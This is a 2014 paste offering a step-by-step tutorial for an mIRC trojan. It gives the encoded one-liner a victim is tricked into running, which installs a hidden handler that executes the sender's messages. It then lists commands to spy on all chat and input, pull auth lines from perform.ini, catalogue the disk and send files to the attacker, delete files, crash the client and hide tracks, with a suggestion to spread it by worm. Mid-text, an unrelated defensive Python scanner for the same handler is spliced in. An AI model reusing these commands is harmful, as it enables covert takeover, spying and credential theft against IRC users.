neo71

Tutorial IRC trojan

Dec 20th, 2014
  1. 1) Infect the victim
  2.  
  3.  
  4.  
  5. The Trojan can be activated by the victim when he writes the next command:
  6.  
  7.  
  8.  
  9. //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
  10. msg YOURNICK i love you
  11.  
  12.  
  13.  
  14. YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
  15. the ' | msg YOURNICK I love you ' part.
  16.  
  17.  
  18.  
  19. This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
  20. ^*:text:ins*:?:{ . $+ $2- | haltdef }
  21.  
  22. The haltdef will block your messages to the victim beginning with 'ins'. With this the user can’t see your commands, so he
  23. won’t have a clue who is controlling his mIRC.
  24.  
  25. Example:
  26.  
  27. /msg victim ins msg #channel hi
  28.  
  29. This will let the victim message #channel the 'hi' message, but the victim will NOT see it; all others in the channel will.
  30. And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn’t it? :)
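Added example, not part of the original paste: a scanner for chat logs and mIRC script folders that flags the handler described above, including when it is hidden inside `$decode()`. The function names and finding labels are assumptions of this example; the sample lines are constructed from the command quoted in the paste.

```python
import base64
import binascii
import re

# $decode(<base64>,m) as it appears in a pasted mIRC command line.
DECODE_RE = re.compile(r"\$decode\(\s*([A-Za-z0-9+/=]+)\s*,\s*m\s*\)", re.I)
# Remote text event: on [^]<level>:TEXT:<match>:<where>:<body>
EVENT_RE = re.compile(r"on\s+(\^?)[^:\s]*:text:[^:]*:[^:]*:(.*)", re.I)
# A statement whose command name is taken from the message words ($1-, $2-, ...).
CMD_FROM_MSG_RE = re.compile(r"^\.?\s*(?:\$\+\s*)?\$\d+-?(?:\s|$)")

# Constructed sample input: the one-liner quoted in the paste, and a harmless handler.
PASTED_LINE = ("//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8"
               "IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc")
BENIGN_LINE = "on *:TEXT:!hello*:#:{ msg $chan hi $1- }"

def expand_decodes(text):
    """Return the text plus every base64 payload hidden in $decode(...,m)."""
    layers = [text]
    for blob in DECODE_RE.findall(text):
        try:
            layers.append(base64.b64decode(blob, validate=True).decode("latin-1"))
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
    return layers

def inspect_handler(line):
    """Findings for one script line; an empty set means nothing suspicious."""
    m = EVENT_RE.search(line)
    if not m:
        return set()
    caret, body = m.groups()
    statements = [s.strip(" {}") for s in body.split("|")]
    findings = set()
    if any(CMD_FROM_MSG_RE.match(s) for s in statements):
        findings.add("runs-message-text-as-command")
    if caret and any(s.lower().startswith("halt") for s in statements):
        findings.add("hides-trigger-message")
    return findings

def scan(text):
    """Scan a chat line or .mrc body, looking inside $decode() payloads too."""
    findings = set()
    for layer in expand_decodes(text):
        for line in layer.splitlines():
            findings |= inspect_handler(line)
    if DECODE_RE.search(text) and re.search(r"\b(write|load)\b", text, re.I):
        findings.add("decode-written-to-script")
    return findings
```

Running `scan()` over every file listed in mIRC's Remote tab and over logged chat lines catches both the pasted one-liner and the script file it leaves behind; an ordinary handler that only uses `$1-` as an argument is not flagged.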
  31.  
  32.  
  33.  
  34. When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
  35. him an excess flood if he is on too many 'popular' channels (channels with much activity)). To add the spy part (it will send
  36. you all his activity, messages received, messages sent and commands executed) execute the next commands:
  37.  
  38.  
  39.  
  40. 2) Spy the victim:
  41.  
  42. /msg victim ins write -c myscript.mrc
  43.  
  44. /msg victim ins unload -rs myscript.mrc
  45.  
  46. /msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
  47.  
  48. /msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ >
  49. $1- }
  50.  
  51. /msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+
  52. >,[COMMAND]) $1- }
  53.  
  54. /msg victim ins load -rs myscript.mrc
  55.  
  56.  
  57.  
  58. Once that is done, you’ll receive the msgs immediately. You can stop the spy function by typing the next command:
  59.  
  60.  
  61.  
  62. /msg victim ins unload -rs myscript.mrc
  63.  
  64.  
  65.  
  66. Note: victim = the nick of the victim who has executed that command, and who has the Trojan.
  67.  
  68.  
  69.  
  70. 3) Make other remote files (.mrc)
  71.  
  72. You can make remote files yourself and add useful functions in it.
  73.  
  74. /msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
  75.  
  76. /msg victim ins .load –rs YOURSCRIPTNAMEt.mrc
  77.  
  78.  
  79.  
  80. 4) Use of the Trojan:
  81.  
  82. Well this is limited, but this is the main basic: you can make commands yourself, I’ll try to make more advanced commands
  83. later :)
  84.  
  85.  
  86.  
  87. REMOVE FILE :
  88.  
  89. /msg victim ins remove C:\Textfile.txt
  90.  
  91.  
  92.  
  93. OPEN SITE:
  94.  
  95. /msg victim ins url www.site.com
  96.  
  97.  
  98.  
  99. JOIN CHANNEL:
  100.  
  101. /msg victim ins join #channel
  102.  
  103.  
  104.  
  105. PART CHANNEL:
  106.  
  107. /msg victim ins part #channel
  108.  
  109.  
  110.  
  111. QUERY USER:
  112.  
  113. /msg victim ins query user
  114.  
  115.  
  116.  
  117. MSG USER:
  118.  
  119. /msg victim ins msg user
  120.  
  121.  
  122.  
  123. INVITE USER:
  124.  
  125. /msg victim ins invite user #channel
  126.  
  127.  
  128.  
  129. BAN USER:
  130.  
  131. /msg victim ins ban #channel user
  132.  
  133.  
  134.  
  135. KICK USER:
  136.  
  137. /msg victim ins kick #channel user
  138.  
  139.  
  140.  
  141. IGNORE USER:
  142.  
  143. /msg victim ins ignore *!*@host.com
  144.  
  145.  
  146.  
  147. UNIGNORE USER:
  148.  
  149. /msg victim ins unignore *!*@host.com
  150.  
  151.  
  152.  
  153. CHANGE NICK:
  154.  
  155. /msg victim ins nick thenickyouwant
  156.  
  157.  
  158.  
  159. OP USER:
  160.  
  161. /msg victim ins mode #channel +o user
  162.  
  163.  
  164.  
  165. VOICE USER:
  166.  
  167. /msg victim ins mode #channel +v user
  168.  
  169.  
  170.  
  171. CHANGE TOPIC:
  172.  
  173. /msg victim ins topic #channel text
  174.  
  175.  
  176.  
  177. RECEIVE FILE:
  178.  
  179. /msg victim ins dcc send user file
  180.  
  181. or
  182.  
  183. /msg victim ins dcc send user C:\something.sth
  184.  
  185.  
  186.  
  187. EDIT TEXT:
  188.  
  189. /msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit
  190.  
  191. (-l1 --> first line)
  192.  
  193.  
  194.  
  195. READ A PIECE OF FILE (LIKE PERFORM):
  196.  
  197. The following commands must be executed after each other:
  198.  
  199. /msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
  200.  
  201. /msg victim ins .load -rs mab
  202.  
  203. /msg victim ins abcd123
  204.  
  205.  
  206.  
  207. SEARCH HARD DISK FOR A FILE:
  208.  
  209. /msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
  210.  
  211. /msg victim ins .load -rs MAB1
  212.  
  213. /msg victim ins MAB1
  214.  
  215.  
  216.  
  217. LET HIS mIRC CRASH:
  218.  
  219. /msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
  220.  
  221. /msg victim ins .load -rs MAB2
  222.  
  223. /msg victim ins MAB2
  224.  
  225.  
  226.  
  227. SCAN HIS HARD DISK AND SAVE IT AS .txt:
  228.  
  229. //echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
  230.  
  231.  
  232.  
  233. Note: Probably you want this file, well you do this:
  234.  
  235. /msg victim ins dcc send YOURNICK C:\M_A_B.txt
  236.  
  237. ** Important note **
  238.  
  239. The victim will see the send dialog, so act quick; for security reasons I suggest to write another trojan on another file, like:
  240.  
  241. /msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
  242. .load -rs MyNewScript.mrc
  243.  
  244.  
  245.  
  246. FIND THE VICTIMs IP WHEN HE USES A MASK:
  247.  
  248. /msg victim ins //msg YOURNICK $ip
  249.  
  250.  
  251.  
  252. FIND THE VICTIMs HOST WHEN HE USES A MASK:
  253.  
  254. /msg victim ins //msg YOURNICK $host
  255.  
  256.  
  257.  
  258. FIND THE VICTIMs OS:
  259.  
  260. /msg victim ins //msg YOURNICK $os
  261.  
  262.  
  263.  
  264. FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:
  265.  
  266. /msg victim ins //msg YOURNICK $server
  267.  
  268.  
  269.  
  270. FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:
  271.  
  272. /msg victim ins //msg YOURNICK $time
  273.  
  274.  
  275.  
  276. FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:
  277.  
  278. /msg victim ins //msg YOURNICK $date
  279.  
  280.  
  281.  
  282. FIND OUT IF THE VICTIM IS AWAY
  283.  
  284. /msg victim ins //msg YOURNICK $away
  285.  
  286.  
  287.  
  288. FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:
  289.  
  290. /msg victim ins //msg YOURNICK $serverIP
  291.  
  292.  
  293.  
  294. FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:
  295.  
  296. /msg victim ins //msg YOURNICK $url
  297.  
  298.  
  299.  
  300. FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:
  301.  
  302. /msg victim ins //msg YOURNICK $victim
  303.  
  304.  
  305.  
  306. TURN THE AUTO JOIN ON INVITE ON (or OFF)
  307.  
  308. /msg victim ins ajinvite on
  309.  
  310.  
  311.  
  312. LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
  313.  
  314. /msg victim ins amsg <the message you want him to say on all channels>
  315.  
  316.  
  317.  
  318. CHANGE THE VICTIMs ALTERNATIVE NICK:
  319.  
  320. /msg victim ins anick <nickname>
  321.  
  322.  
  323.  
  324. CHANGE THE VICTIMs BACKGROUND PICTURE:
  325.  
  326. /msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
  327.  
  328. with
  329.  
  330. -a = active window
  331.  
  332. -m = main mIRC window
  333.  
  334. -s = status window
  335.  
  336. -g = finger window
  337.  
  338. -d = single message window
  339.  
  340.  
  341.  
  342. -e = set as default
  343.  
  344.  
  345.  
  346. -cfnrtp = center, fill, normal, stretch, tile, photo
  347.  
  348.  
  349.  
  350. -l = toolbar
  351.  
  352. -u = toolbar buttons
  353.  
  354. -h = switchbar
  355.  
  356.  
  357.  
  358. -x = no background picture
  359.  
  360.  
  361.  
  362. LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
  363.  
  364. /msg victim ins channel #CHANNELNAME
  365.  
  366. Note: the victim must be on #CHANNELNAME
  367.  
  368.  
  369.  
  370. CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
  371.  
  372. /msg victim ins clearall [-snqmtgu]
  373.  
  374. s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
  375.  
  376.  
  377.  
  378. LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
  379.  
  380. /msg victim ins clipboard <the text you want to be clipboarded>
  381.  
  382.  
  383.  
  384. CLOSE THE OPEN QUERIES OF THE VICTIM:
  385.  
  386. /msg victim ins close
  387.  
  388.  
  389.  
  390. LET THE VICTIM QUIT mIRC:
  391.  
  392. /msg victim ins quit <the quit message you want>
  393.  
  394.  
  395.  
  396. LET THE VICTIM DISCONNECT FROM SERVER:
  397.  
  398. /msg victim ins disconnect
  399.  
  400.  
  401.  
  402. LET THE VICTIM CHANGE SERVER:
  403.  
  404. /msg victim ins server the.server.you.want
  405.  
  406.  
  407.  
  408. LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
  409.  
  410. /msg victim ins server -m
  411.  
  412. /msg victim ins server the.server.you.want
  413.  
  414.  
  415.  
  416. LET THE VICTIM GIVE YOU FLAGS (if he is able to):
  417.  
  418. /msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
  419.  
  420. Note:
  421.  
  422. |TheBot| = the bot who can give flags
  423.  
  424. Chanlev = can be different, sometimes it is also, "adduser"
  425.  
  426. flag = the flag you want
  427.  
  428. YOURNICK = your nick
  429.  
  430.  
  431.  
  432. CHANGE THE VICTIMs FONT AND FONT SIZE:
  433.  
  434. /msg victim ins font -asgbd <fontsize> <fontname>
  435.  
  436.  
  437.  
  438. CHANGE THE VICTIMs FULL NAME:
  439.  
  440. /msg victim ins fullname <name>
  441.  
  442.  
  443.  
  444. LET THE VICTIM REJOIN A CHANNEL:
  445.  
  446. /msg victim ins hop #CHANNEL
  447.  
  448.  
  449.  
  450. MAKE A NEW DIRECTORY ON THE VICTIMs HARD DISK:
  451.  
  452. /msg victim ins mkdir <dirname>
  453.  
  454.  
  455.  
  456. NOTE:
  457.  
  458. victim = nick of the victim
  459.  
  460. user = your nick
  461.  
  462. 5) Additional Information: this trojan is NOT detectable by any virus scanner, since it’s code in mIRC... And remember that
  463. you don’t need a file to send to the victim, the victim will make (write) a file by executing that command. If you want to let it
  464. spread by an IRC worm, I would suggest that you use a bot...
  465.  
  466. by NE0